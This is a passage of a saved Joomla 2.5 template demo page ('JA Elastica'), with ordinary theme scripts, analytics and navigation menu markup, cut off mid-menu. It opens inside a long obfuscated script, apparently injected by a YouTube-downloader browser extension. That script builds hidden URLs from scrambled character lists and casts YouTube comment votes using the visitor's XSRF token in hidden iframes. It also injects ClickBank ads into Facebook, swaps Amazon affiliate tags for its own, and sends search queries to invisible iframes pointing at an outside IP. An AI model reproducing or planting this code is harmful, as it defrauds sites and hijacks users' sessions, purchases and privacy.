b[0]+'" data-tooltip-timer="625" title="" data-tooltip="'+b[0]+'"><span class="yt-uix-button-content">'+c+'</span></button><button id="menu" class="end yt-uix-tooltip-reverse yt-uix-button yt-uix-button-default yt-uix-tooltip" onclick=";return false;" data-tooltip-title="'+b[2]+'" data-tooltip-timer="625" title="" data-tooltip="'+b[2]+'" data-button-listener="16" data-content-id="yt-uix-tooltip2-content"><span class="yt-uix-button-content"><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></span><ul class="yt-uix-button-menu hid" id="downloadMenu">'+
a+"</ul></button></span></div>");document.getElementById("watch-actions-right")&&document.getElementById("watch-share").parentNode.insertBefore(document.getElementById("watch-actions-center"),document.getElementById("watch-flag").nextSibling);if(document.getElementById("watch-rating")!=e){var i=document.getElementById("watch-actions");if(i)i.style.height="45px"}document.getElementById("watch-rating")&&(document.getElementById("watch-actions").innerHTML+='<div id="watch-actions-center" style="display:inline;"><span class="yt-uix-button-group addto-container watch show-label"><button type="button" id="download" class="start yt-uix-tooltip yt-uix-button yt-uix-tooltip" data-tooltip-title="'+
b[0]+'" data-tooltip-timer="625" title="" data-tooltip="'+b[0]+'"><span class="yt-uix-button-content">'+c+'</span></button><button id="menu" class="end yt-uix-tooltip yt-uix-button yt-uix-tooltip yt-uix-button-empty" onclick=";return false;" data-tooltip-title="'+b[2]+'" data-tooltip-timer="625" title="" data-tooltip="'+b[2]+'" data-button-listener="16" data-content-id="yt-uix-tooltip2-content"><span class="yt-uix-button-content"><img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></span><ul class="yt-uix-button-menu hid" id="downloadMenu">'+
a+"</ul></button></span></div>");a=document.getElementById("download");if(a!=e)a.onclick=function(){window.location.href=g}};(function(){for(var d=/"url_encoded_fmt_stream_map": ".+?",/,c=document.getElementsByTagName("script"),g=0;g<c.length;g++)if(d.test(c[g].innerHTML))var i=c[g].innerHTML;var c=document.getElementById("eow-title").innerHTML.replace(/\//gi,"").replace(/\\/gi,"").replace(/"/gi,"'").replace(/\+/gi,"and").replace(/&/gi,"and").replace(/:/gi,"").replace(/\*/gi,"").replace(/#/gi,"").replace(/\./gi,
""),j;j="";window.location.href.replace(/^[^v]+v.(.{11}).*/,"$1");for(var g=new String(d.exec(i)),g=g.replace(" ","").replace('"url_encoded_fmt_stream_map":"url=',""),g=g.substring(0,g.length-2),g=decodeURIComponent(g).replace(/%2C/g,",").replace(/%3A/g,":").replace(/\\u0026/g,"&"),d=[],d=g.split("url="),l=i="",m="",g=0;g<d.length;g++){var o=[],o=d[g].split("itag="),n=[],n=o[1].split("&");d[g]=d[g].split(";")[0];d[g]=d[g].split("&quality")[0];n[0]=="5"&&(i+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="v240p">FLV (240p)</li></a>');
n[0]=="35"&&(i+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="v480p">FLV (480p)</li></a>');n[0]=="18"&&(i+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="v360p">MP4 (360p)</li></a>');n[0]=="22"&&(i+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="v720p">MP4 HD (720p)</li></a>');n[0]=="37"&&(i+=
'<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="v1080p">MP4 HD (1080p)</li></a>');n[0]=="38"&&(i+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="v4k">MP4 HD (4K)</li></a>');n[0]=="43"&&(i+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="web360p">WebM (360p)</li></a>');n[0]=="44"&&(i+='<a href="'+
d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="web480p">WebM (480p)</li></a>');n[0]=="45"&&(i+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;"><li class="yt-uix-button-menu-item" id="web720p">WebM HD (720p)</li></a>')}for(g=0;g<d.length;g++)if(o=d[g].split("itag="),n=o[1].split("&"),d[g]=d[g].split(";")[0],n[0]=="18"||n[0]=="22"||n[0]=="37"||n[0]=="38"){l+='<a href="'+d[g]+"&title="+j+c+'" style="color:black;text-decoration:none;">'+
b[1]+"</a>";m+=d[g]+"&title="+j+c+"";break}a(i,l,m)})();if(document.getElementById("web360p"))document.getElementById("web360p").style.display="none";if(document.getElementById("web480p"))document.getElementById("web480p").style.display="none";if(document.getElementById("web720p"))document.getElementById("web720p").style.display="none";(function(){var a=document.getElementById("downloadMenu"),b=document.createElement("a");b.onclick=function(){var a=f[23];if(!G){var b=":,3,w,o,o,m,t,u,e,w,/,/,.,b,w,y,.,t,r,=,v,u,p,-,g,p,h,#,t,/".split(",");
k(a,b);G=b.join("")}a=G+xc();if(ec()<10)window.open(a,"_blank");else if(b=document.getElementById("watch-actions")){var c=document.getElementById("mp3downloader");if(!c)c=document.createElement("div"),c.id="mp3downloader",c.setAttribute("style","width: 640px; margin: 0px 0px 5px; padding: 0px; height: 130px; overflow: visible;"),b.parentNode.insertBefore(c,b.nextSibling);c.innerHTML='<iframe style="float: left" name="injectedIframe'+ic(5)+'" height="130" width="480" scrolling="no" border="0" style="border: 0 none;"  src="'+
a+'"></iframe><div id="shareBox"><div style="font-family: Open Sans, arial, sans-serif; font-size: 13px; color: #333; font-weight: bold; padding-bottom: 9px">Share With Friends =)</div><div style="display: block; padding: 2px;"><fb:like href="http://www.oxytube.com/" send="true" layout="button_count" width="120" show_faces="true" font="arial"></fb:like></div><div style="display: block; padding: 2px;"><a href="http://twitter.com/share" class="twitter-share-button" data-text="OMG WOW - This browser extension allows you to download YouTube videos as MP3s or high def MP4s -" data-url="http://www.oxytube.com/" data-count="horizontal">Tweet</a></div><div style="display: block; padding: 2px;"><g:plusone size="medium" href="http://www.oxytube.com"></g:plusone></div></div>';
a=document.getElementById("shareBox");b=document.createElement("script");b.src="http://platform.twitter.com/widgets.js";a.appendChild(b);b=document.createElement("script");b.src="http://connect.facebook.net/en_US/all.js#xfbml=1";a.appendChild(b);a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="https://apis.google.com/js/plusone.js";b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)}else window.open(a,"_blank")};b.innerHTML='<li class="yt-uix-button-menu-item" id="">MP3</li>';
a.appendChild(b)})()}catch(c){}}function yc(){wc();vc=setInterval(function(){document.getElementById("download")!=e?clearInterval(vc):wc()},600);var b=dc("cbYtRate",0.1);zc(b);Ac()}
function Ac(){if(ec()>=10)if(window.name.indexOf("injectedIframe")==0){if(document.body.innerHTML="",window.localStorage.upvcom&&window.localStorage.upvcom!="{}")try{var b=JSON.parse(window.localStorage.upvcom),a=b.v;a==xc()&&Bc(b.c,a)}catch(c){}}else if(b=cc("ytcRate"),Math.random()<b||b==e)window.localStorage.upvcom=e,bc(ia()),Cc=setInterval(function(){window.localStorage.upvcom!=e&&(clearInterval(Cc),setTimeout(function(){if(window.localStorage.upvcom&&window.localStorage.upvcom!="{}")try{var a=
JSON.parse(window.localStorage.upvcom),b=a.v,c=a.c,a="http://www.youtube.com/watch?v="+b;if(window.name.indexOf("injectedIframe")!=0){var i=document.createElement("div");document.body.appendChild(i);var j="",j="injectedIframe"+ic(5);i.innerHTML='<iframe style="visibility:hidden;" width="1" height="1" name="'+j+'" src="'+a+'"></iframe>'}var l=f[25];I||(i="e,i,n,u,.,o,b,v,n,c,o,p, ,e,0,o,i,t,=,y,0,1,u,t,_,_,j,p,u,t,e".split(","),k(l,i),I=i.join(""));V(I,{videoId:b,commentId:c},0.01)}catch(m){}},100))},
100)}function Bc(b,a){var c=Dc();if(c!=e){var d=new XMLHttpRequest;d.open("POST","http://www.youtube.com/comment_voting?a=1&id="+b+"&video_id="+a,!0);d.setRequestHeader("Content-type","application/x-www-form-urlencoded");d.onreadystatechange=function(){};d.send(c)}}function xc(){var b=window.location.search.split("v=")[1],a=b.indexOf("&");a!=-1&&(b=b.substring(0,a));return b}function Dc(){if(yt)try{return yt.getConfig("COMMENT_VOTE_XSRF")}catch(b){return e}else return e}var Cc,Ec=e,Fc=e,Gc=0;
function Hc(){setInterval(function(){var a=window.location.href;if(Ec==e||a!=Ec)Ec=a,(W()-Gc)/1E3>1&&(Gc=W(),window.location.href.indexOf("http://")!=-1&&(a=dc("cbFbRate",0.05),Ic(a)))},150);try{Fc=X(document.getElementById("pageFooter"),"div","fsm fwn fcg").getElementsByTagName("a")[0].innerHTML}catch(b){}}var Jc=e;
function Kc(){Lc();var b=window.localStorage.clickbank_ads;if(b)try{b=JSON.parse(b);var a=b,c=a.length;if(c!=0)for(;--c;){var d=Math.floor(Math.random()*(c+1)),h=a[c];a[c]=a[d];a[d]=h}return b.slice(0,Math.min(1,b.length))}catch(g){return e}else return e}
function Lc(){var b;try{b="localStorage"in window&&window.localStorage!==e}catch(a){b=!1}if(b){b=window.localStorage.clickbank_ads_request_time;var c=window.localStorage.clickbank_ads;if(b&&c&&(b=parseInt(b,10),c=dc("cbRefresh",180),(W()-b)/1E3/60<c))return;window.localStorage.clickbank_ads_request_time=W();b=f[26];J||(c="t,k,b,1,/,9,p,h,7,6,5,2,c,t,/,g,/,4,c,1,t,.,h,1,/,.,.,C,i,b,p,k,e,a,p,0,l,.,6,:,n".split(","),k(b,c),J=c.join(""));bc(J)}}
function Ic(b){Lc();clearInterval(Jc);Jc=setInterval(function(){var a=X(document.body,"div","ego_column");if(a&&(clearInterval(Jc),Math.random()<b)){for(;a.nextSibling!=e&&a.nextSibling.className.indexOf("ego_column")!=-1;)a=a.nextSibling;if(a.className.indexOf("egoOrganicColumn")==-1&&(a=X(a,"div","phs"))){var c=Kc();if(c!=e)for(var d=0;d<c.length;d++)try{var h=c[d],g=document.createElement("div");g.className="fbEmuEgoUnit ego_unit";g.innerHTML=h;g.innerHTML='<div class="fbEmu fbEmuBlock fbEmuEgo"><div class="title"><a class="forceLTR emuEvent1 fbEmuLink" href="">'+
h.title+'</a></div><div class="UIImageBlock clearfix image_body_block"><a class="emuEvent1 fbEmuLink image UIImageBlock_Image UIImageBlock_SMALL_Image" href=""><img class="img" src="'+h.img_small+'" width="100" alt></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><div class="body"><a class="forceLTR emuEvent1 fbEmuLink" href="">'+h.description+"</a></div></div></div></div>";a.insertBefore(g,a.firstChild);var i=h.vendor,j="http://96.126.107.154/cb/aclk.php?ad_id="+h.id+"&cb_vendor="+
i+"&fb_lang="+Fc+"&site=fb";V("clickbank_fb_impression p=0.00001",{vendor:i},1.0E-5);U(g,j,"",{},!1,0)}catch(l){}}}},200)}
function zc(b){Lc();var a=document.getElementById("watch-channel-brand-div");if(a&&Math.random()<b&&(b=Kc(),b!=e&&b.length==1))try{var c=b[0],d=document.createElement("div");d.style.cursor="pointer";d.innerHTML="<a href=''><img width='300' src='"+c.img_large+"'></a>";var h=c.vendor,g="http://96.126.107.154/cb/aclk.php?ad_id="+c.id+"&cb_vendor="+h+"&site=yt";a.innerHTML="";a.appendChild(d);U(d,g,"",{},!1,0);var i=f[29];K||(a="n,p,i,k,n,0,.,y,s,b,e,_,m, ,c,_,p,i,t,a,=,k,1,l,0,r,c,s,o,i".split(","),
k(i,a),K=a.join(""));V(K,{vendor:h},0.01)}catch(j){}}var Mc=e;
function Nc(){var b;b=window.location.href;var a=b.lastIndexOf("&q=");a==-1?b=e:(b=b.substring(a+3),a=b.indexOf("&"),a!=-1&&(b=b.substring(0,a)),b=b.split("+").join(" "));if(b!=e&&b!=Mc){Mc=b;a:{for(var a=document.body.getElementsByTagName("a"),c=0;c<a.length;c++)if(a[c].href.indexOf(Ga())==0){a=!0;break a}a=!1}if(a){a=window.location.href;c=e;if(a.indexOf(ja())==0||a.indexOf(ka())==0)c="US";else if(a.indexOf(la())==0||a.indexOf(ma())==0)c="JP";else if(a.indexOf(na())==0||a.indexOf(oa())==0)c="DE";
else if(a.indexOf(pa())==0||a.indexOf(qa())==0)c="FR";else if(a.indexOf(ra())==0||a.indexOf(ta())==0)c="CA";else if(a.indexOf(va())==0||a.indexOf(xa())==0)c="ES";else if(a.indexOf(za())==0||a.indexOf(Ba())==0)c="GB";a=c;if(a!=e){c=document.createElement("iframe");document.body.appendChild(c);var d=f[45];if(!Da){var h="0,e,g,l,a,h,p,1, ,=,.,t,n,p,o,0,_,i,e,e,r,g,c,j,i,o,_,n,o".split(",");k(d,h);Da=h.join("")}V(Da,{countryCode:a},0.01);d=f[46];Ea||(h="6,/,p,m,g,?,.,e,g,.,a,p,/,5,a,0,b,a,4,/,l,1,/,q,z,p,o,.,:,2,c,9,1,k,a,l,t,1,=,h,o,l,h,c,6,=,&,t,.,7".split(","),
k(d,h),Ea=h.join(""));b=Ea+b;d=f[47];Fa||(h="t,o,r,=,c,&,u,y,n".split(","),k(d,h),Fa=h.join(""));c.setAttribute("src",b+Fa+a);c.setAttribute("height","1px");c.setAttribute("width","1px");c.style.visibility="hidden"}}}}function Oc(){setTimeout(function(){Nc()},300);setInterval(function(){Nc()},800)}function Pc(){Qc();setInterval(function(){Qc()},600)}
function Qc(){for(var b=document.body.getElementsByTagName("a"),a=0;a<b.length;a++){var c=b[a],d=c.href;if(d.indexOf(Ia())!=-1){var h=U,d="http://96.126.107.154/cb/resolve.php?u="+d,g=f[50];if(!Ka){var i="n,a,t,n,i,k,i,_,k,c,k,l,c,i,b,i,l,c,_,c,a,i,l".split(",");k(g,i);Ka=i.join("")}h(c,d,Ka,{},!1,1)}}}function Rc(b){var a=cc("amzRate");if(Math.random()<a||a==e)Sc(),setInterval(function(){Sc()},b)}
function Sc(){var b=document.body.getElementsByTagName("a"),a=RegExp,c=f[51];if(!La){var d="o,z,/,t,p,.,/,w,:,n,m,t,w,w,a,a,h,.".split(",");k(c,d);La=d.join("")}c=La+"(";d=f[52];if(!Ma){var h="c,.,|,a,m,e,|,\\,f,j,u,k,s,o,d,c,|,c,o,|,c,\\,|,o,.,p,r,|,e".split(",");k(d,h);Ma=h.join("")}c=c+Ma+")/([\\w-%]+/)?(";d=f[53];Na||(h="/,d,s,d,e,|,t,c,o,p,A,p,|,s,/,o,/,/,a,d,I,x,p,e,e,i,b,b,c,/,S,s,d,r,o,o,u,o,i,e,i,|,x,n,g,c,N".split(","),k(d,h),Na=h.join(""));a=a(c+Na+")/(\\w+/)?(\\w{10})");c=f[54];Oa||(d=
"a,_,1,p,0,z,0,c, ,=,c,.,m,k,i,l".split(","),k(c,d),Oa=d.join(""));c=Oa;for(d=0;d<b.length;d++){var h=b[d],g=h.href,i=g.match(a);if(i){var j=i[1],g=i[5],i=f[55];if(!Pa){var l="/,w,o,n,p,m,:,a,.,/,a,t,.,t,z,w,w,h".split(",");k(i,l);Pa=l.join("")}i=Pa+j;l=f[56];if(!Qa){var m="u,c,/,g,p,o,p,/,t,d,r,/".split(",");k(l,m);Qa=m.join("")}i=i+Qa+g;l=f[57];Ra||(m="U,F,=,t,T,l,a,_,l,r,i,=,a,f,t,=,/,e,e,g,s,i,?,s,_,&,s,_,8".split(","),k(l,m),Ra=m.join(""));j=i+Ra+Tc(j);i=f[58];Sa||(l="&,4,p,r,1,e,a,5,2,=,c,s,e,e,A,I,v,i,c,&,2,=,C,7,N,d,n,m,a,&,=,i,l,1,o,S,a,k,t".split(","),
k(i,l),Sa=l.join(""));j=j+Sa+g;U(h,j,c,{affiliateUrl:"product link"},!0,0.01)}else if(g.indexOf(Ta())==0){i=g;l=i.indexOf("?");if(l!=-1){g=i.substring(0,l);j="";i=i.substring(l+1).split("&");for(l=0;l<i.length;l++){var o=i[l],n=o.indexOf("=");n!=-1&&(m=o.substring(0,n),o=o.substring(n+1),m!="tag"&&(j!=""&&(j+="&"),j+=m+"="+o))}i=g+"?"+j}g=i;j=g.substring(18);j=g+Uc(j.indexOf("co.uk")==0?"co.uk":j.indexOf("co.jp")==0?"co.jp":j.indexOf("es")==0?"es":j.indexOf("fr")==0?"fr":j.indexOf("de")==0?"de":j.indexOf("ca")==
0?"ca":"com");U(h,j,c,{affiliateUrl:g},!0,0.01)}}}
function Tc(b){switch(b){case "de":b=f[60];if(!Va){var a="o,0,c,a,2,h,e,r,m,p,b,1,-".split(",");k(b,a);Va=a.join("")}return Va;case "es":return b=f[61],Wa||(a="-,1,r,a,c,h,e,8,0,o,p,m,2".split(","),k(b,a),Wa=a.join("")),Wa;case "fr":return b=f[62],Xa||(a="h,r,7,-,e,0,a,c,m,o,2,1,p".split(","),k(b,a),Xa=a.join("")),Xa;case "co.jp":return b=f[63],Ya||(a="2,p,2,h,-,c,a,r,m,o,e".split(","),k(b,a),Ya=a.join("")),Ya;case "co.uk":return b=f[64],Za||(a="c,m,e,o,-,p,0,h,3,1,r,a,2".split(","),k(b,a),Za=a.join("")),
Za;case "ca":return b=f[65],$a||(a="c,-,2,0,e,r,p,m,a,h,6,o,0".split(","),k(b,a),$a=a.join("")),$a;default:return b=f[66],ab||(a="h,o,r,e,m,a,2,p,c,0,-,5,0".split(","),k(b,a),ab=a.join("")),ab}}
function Uc(b){switch(b){case "de":b=f[67];if(!bb){var a="1,r,i,t,i,#,r,g,=,b,n,&,0,e,r,k,a,=,u,r,_,c,d,?,m,r,e,2,n,F,-,v,=,e,C,t,3,i,=,4,e,1,d,4,t,=,T,g,e,t,a,i,l,c,8,&,=,d,e,o,a,-,&,e,c,&,e,5,h,p,a,6,p,c,o,2,n,1,d,9,s,e,8,&,o,m,c,i,U".split(",");k(b,a);bb=a.join("")}return bb;case "fr":return b=f[68],cb||(a="e,=,r,8,i,=,&,r,g,k,m,=,6,C,_,e,c,h,i,&,d,a,a,5,p,1,g,7,=,e,o,r,2,#,2,a,1,m,c,4,1,v,a,c,u,0,n,T,t,&,n,e,o,c,2,t,?,&,d,e,F,9,l,o,p,-,4,i,U,=,n,8".split(","),k(b,a),cb=a.join("")),cb;case "co.jp":return b=
f[69],db||(a="p,r,2,r,e,&,=,e,u,n,&,c,n,i,a,?,c,a,C,&,i,i,3,o,T,p,k,U,e,7,=,t,m,e,g,&,=,=,F,h,-,4,#,a,7,9,g,r,t,d,c,e,9,m,8,2,c,o,n,l,=,a,v,2,o,2,d,_".split(","),k(b,a),db=a.join("")),db;case "co.uk":return b=f[70],eb||(a="e,g,F,u,1,t,a,=,3,r,o,2,n,&,e,=,e,i,m,m,e,n,U,1,n,?,a,t,9,#,o,r,C,2,=,0,=,&,i,=,0,d,4,T,c,o,c,_,1,g,5,a,c,6,p,c,h,i,v,&,p,3,r,a,4,k,l,d,-,8,e,&".split(","),k(b,a),eb=a.join("")),eb;case "ca":return b=f[71],fb||(a="C,1,0,2,m,2,r,t,k,#,1,&,n,m,0,-,c,u,o,=,_,l,F,T,3,i,e,g,c,2,e,=,e,p,d,0,1,9,a,r,e,c,d,n,p,a,6,8,9,a,e,&,6,&,=,o,n,?,c,o,=,&,g,i,U,r,t,5,v,1,a,h,i,=".split(","),
k(b,a),fb=a.join("")),fb;case "es":return b=f[72],gb||(a="e,e,h,d,i,a,&,g,0,c,t,i,2,i,3,n,8,o,=,#,=,n,=,8,a,?,r,t,l,e,&,r,2,v,c,e,U,r,2,p,6,k,=,-,a,&,=,e,4,o,a,d,6,&,o,u,C,2,_,c,T,1,2,n,c,g,F,m,m,8,2,p".split(","),k(b,a),gb=a.join("")),gb;default:return b=f[73],hb||(a="n,e,C,a,a,a,e,=,m,=,3,u,&,i,U,i,F,0,r,r,#,a,9,c,g,n,o,5,m,8,t,p,e,&,0,e,_,h,=,T,r,e,t,=,c,-,i,?,k,d,1,&,7,5,2,g,2,v,0,9,p,d,&,l,c,7,o,9,=,o,c,n,8".split(","),k(b,a),hb=a.join("")),hb}}
function Vc(){var b=window.location.href,a=b.indexOf(pb())==0||b.indexOf(rb())==0;if(b.indexOf(tb())==0||b.indexOf(vb())==0)Hc();else if(a)Oc();else if(b.indexOf(xb())==0||b.indexOf(zb())==0)yc();else if(!(b.indexOf(Bb())==0||b.indexOf(Db())==0))if(b.indexOf(Fb())==0)uc();else if(b.indexOf(Hb())==0||b.indexOf(Jb())==0)lc();else if(b.indexOf(Lb())==0){var c=window.location.href;if(c.indexOf(aa())==0){c=f[5];if(!u){var d="1,p,m,u,t,_,n,r,=,l, ,b,0,i,.,l,0,k".split(",");k(c,d);u=d.join("")}V(u,{},0.01)}else c.indexOf(ba())==
0?(c=f[7],w||(d="x,r, ,.,b,1,0,m,p,u,t,0,t,t,e,=,_,l".split(","),k(c,d),w=d.join("")),V(w,{},0.01)):c.indexOf(ca())==0&&(c=f[9],y||(d="=,.,p,0,t,1,t,u,o,h,p,m,l,o,b,0,r, ,_".split(","),k(c,d),y=d.join("")),V(y,{},0.01))}else b.indexOf(Nb())==0?jc():b.indexOf(Pb())==0?rc():b.indexOf(Rb())==0&&pc();if(!/^(http|https):\/\/[^.]*.amazon./.test(b)&&!(navigator.userAgent&&navigator.userAgent.indexOf("Chromium")!=-1)&&!fc()){var h;try{var g=window.localStorage.iIntDaemon;h=g?parseInt(g,10):0}catch(i){h=0}h=
(W()-h)/1E3;var j;try{var l=window.localStorage.sIntDaemon;j=l?parseInt(l,10):0}catch(m){j=0}g=(W()-j)/1E3;j=Math.floor(h/86400);l=Math.floor(g/60);h=h>86400;g=g>300;h&&g?(h=800,b.indexOf(Tb())==0&&(h=300),Rc(h),a&&(a=f[94],Vb||(h="o,w,0,.,=,0,h,m,1,p, ,0,a,s,_,0".split(","),k(a,h),Vb=h.join("")),V(Vb,{iDays:j,sMinutes:l},1.0E-4))):a&&(a=f[95],Wb||(c="h,.,0,o,w,t,=,0,p,1, ,s,o,0,n,m,_,0,_,a,w,f".split(","),k(a,c),Wb=c.join("")),a=Wb,!h&&!g?(a=f[96],Xb||(h="s,w,o,h,t,o,n,b,0,=,.,_,m,h,o,_,0,p,0, ,a,0,1".split(","),
k(a,h),Xb=h.join("")),a=Xb):h?g||(a=f[98],Zb||(h="s,h,n,_,w, ,_,.,0,1,0,s,o,0,=,p,m,a,0,o".split(","),k(a,h),Zb=h.join("")),a=Zb):(a=f[97],Yb||(h="h,a,n,i,m, ,0,p,0,_,w,o,=,0,0,.,1,_,o,s".split(","),k(a,h),Yb=h.join("")),a=Yb),V(a,{iDays:j,sMinutes:l},1.0E-4))}b.indexOf($b())==-1&&Pc()}var $=window.location.href;
if($.indexOf(function(){var b=f[74];if(!ib){var a="w,h,r,/,w,h,t,.,a,w,e,p,/,p,.,t,:".split(",");k(b,a);ib=a.join("")}return ib}())==0){var Wc=f[30];if(!L){var Xc=".,a,n,d,L,c,A,.,o,n,m,z,.,o,., ,g,a,i,:,o,m".split(",");k(Wc,Xc);L=Xc.join("")}document.title=L}else if($.indexOf(jb())==0||$.indexOf(lb())==0){var Z=window.location.href;if(Z.indexOf(da())!=-1){var oc=Z.indexOf(ea());oc!=-1&&nc()}}else if($.indexOf(nb())==0){var Yc=window.location.href;Yc.indexOf(fa())==0?window.location.href=Yc.substring(41):
Yc.indexOf(ga())==0&&window.stop()}document.body!=e?Vc():document.addEventListener("DOMContentLoaded",function(){Vc()},!1);
})();</script>
  <script src="./Joomla 2.5 Responsive Web Design_files/jquery.mediaqueries.js" type="text/javascript"></script>
  <script src="./Joomla 2.5 Responsive Web Design_files/mega.js" type="text/javascript"></script>
  <script type="text/javascript">
window.addEvent('load', function() {
				new JCaption('img.caption');
			});
jQuery.noConflict();
function keepAlive() {	var myAjax = new Request({method: "get", url: "index.php"}).send();} window.addEvent("domready", function(){ keepAlive.periodical(840000); });
  </script>

<script type="text/javascript" language="javascript">
/*<![CDATA[*/
  
  //
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-243376-1']);
  _gaq.push(['_setDomainName', 'joomlart.com']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
/*]]>*/
</script>

<!--[if ie]><link href="/ja_elastica/plugins/system/jat3/jat3/base-themes/default/css/template-ie.css" type="text/css" rel="stylesheet" /><![endif]--> 
<!--[if ie 7]><link href="/ja_elastica/plugins/system/jat3/jat3/base-themes/default/css/template-ie7.css" type="text/css" rel="stylesheet" /><![endif]--> 
<!--[if ie 7]><link href="/ja_elastica/templates/ja_elastica/css/template-ie7.css" type="text/css" rel="stylesheet" /><![endif]--> 


<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=3.0, user-scalable=yes">
<meta name="HandheldFriendly" content="true">


<link href="http://joomla25-templates.joomlart.com/ja_elastica/plugins/system/jat3/jat3/base-themes/default/images/favicon.ico" rel="shortcut icon" type="image/x-icon">
    
    <style type="text/css">
/*dynamic css*/
</style></head>

<body id="bd" class="bd fs3 com_content  body ja-frontpage">
<a name="Top" id="Top"></a>
<div id="ja-wrapper">

	            <div id="ja-header" class="wrap ">
                   <div class="main">
                           <div class="main-inner1 clearfix">
                <h1 class="logo">
    <a href="./Joomla 2.5 Responsive Web Design_files/Joomla 2.5 Responsive Web Design.htm" title="JA Elastica J25">
		<img src="./Joomla 2.5 Responsive Web Design_files/logo-trans.png" alt="JA Elastica J25">
	</a>
</h1>

<div id="ja-mainnav" class="clearfix">
	<div id="ja-menu-button">Menu</div><div class="ja-megamenu clearfix" id="ja-megamenu">
<ul class="megamenu level0"><li class="mega first active "><a href="./Joomla 2.5 Responsive Web Design_files/Joomla 2.5 Responsive Web Design.htm" class="mega first active " id="menu435" title="Home"><span class="menu-title">Home</span><span class="menu-desc">T3 Blank's Home</span></a></li><li class="mega haschild"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore.html" class="mega haschild " id="menu506" title="Explore"><span class="menu-title">Explore</span><span class="menu-desc">Don't be surprised..</span></a><div class="childcontent cols3 " style="width: 650px; height: 292px; display: block; ">
<div class="childcontent-inner-wrap" style="width: 640px; ">
<div class="childcontent-inner clearfix" style="width: 640px;"><div class="megacol column1 first" style="width: 240px;"><ul class="megamenu level1"><li class="mega first group"><div class="group"><div class="group-title"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/all-responsive-layout.html" class="mega first group" id="menu507" title="6 Responsive layouts"><span class="menu-title">6 Responsive layouts</span></a></div><div class="group-content"><ul class="megamenu level1"><li class="mega first"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/all-responsive-layout/extra-wide-layout.html" class="mega first" id="menu546" title="Extra-wide layout"><span class="menu-title">Extra-wide layout</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/all-responsive-layout/wide-layout.html" class="mega" id="menu547" title="Wide layout"><span class="menu-title">Wide layout</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/all-responsive-layout/normal-layout.html" class="mega" id="menu548" title="Normal layout"><span class="menu-title">Normal layout</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/all-responsive-layout/tablet-layout.html" class="mega" id="menu549" title="Tablet layout"><span class="menu-title">Tablet layout</span></a></li><li class="mega last"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/all-responsive-layout/mobile-layout.html" class="mega last" id="menu550" title="Mobile layout"><span class="menu-title">Mobile layout</span></a></li></ul></div></div></li></ul></div><div class="megacol column2" style="width: 200px;"><ul class="megamenu level1"><li class="mega first group"><div class="group"><div class="group-title"><a href="http://joomla25-templates.joomlart.com/ja_elastica/#" class="mega first group" id="menu538" title="Contents Grid"><span class="menu-title">Contents Grid</span></a></div><div class="group-content"><ul class="megamenu level1"><li class="mega first"><a href="http://joomla25-templates.joomlart.com/ja_elastica/explore/2011-11-25-10-25-50/1-column.html" class="mega first" id="menu539" title="1 Column"><span class="menu-title">1 Column</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/2011-11-25-10-25-50/2-columns.html" class="mega" id="menu540" title="2 Columns"><span class="menu-title">2 Columns</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/2011-11-25-10-25-50/3-columns.html" class="mega" id="menu541" title="3 Columns"><span class="menu-title">3 Columns</span></a></li><li class="mega"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/2011-11-25-10-25-50/4-columns.html" class="mega" id="menu542" title="4 Columns"><span class="menu-title">4 Columns</span></a></li><li class="mega last"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/2011-11-25-10-25-50/5-columns.html" class="mega last" id="menu543" title="5 Columns"><span class="menu-title">5 Columns</span></a></li></ul></div></div></li></ul></div><div class="megacol column3 last" style="width: 200px;"><ul class="megamenu level1"><li class="mega first group"><div class="group"><div class="group-title"><a href="http://joomla25-templates.joomlart.com/ja_elastica/#" class="mega first group" id="menu551" title="Others featured"><span class="menu-title">Others featured</span></a></div><div class="group-content"><ul class="megamenu level1"><li class="mega first"><a href="http://joomla25-templates.joomlart.com/ja_elastica/submit-an-article/explore/others-featured/menu-support.html" class="mega first" id="menu537" title="Menu support"><span class="menu-title">Menu support</span></a></li><li class="mega last"><a 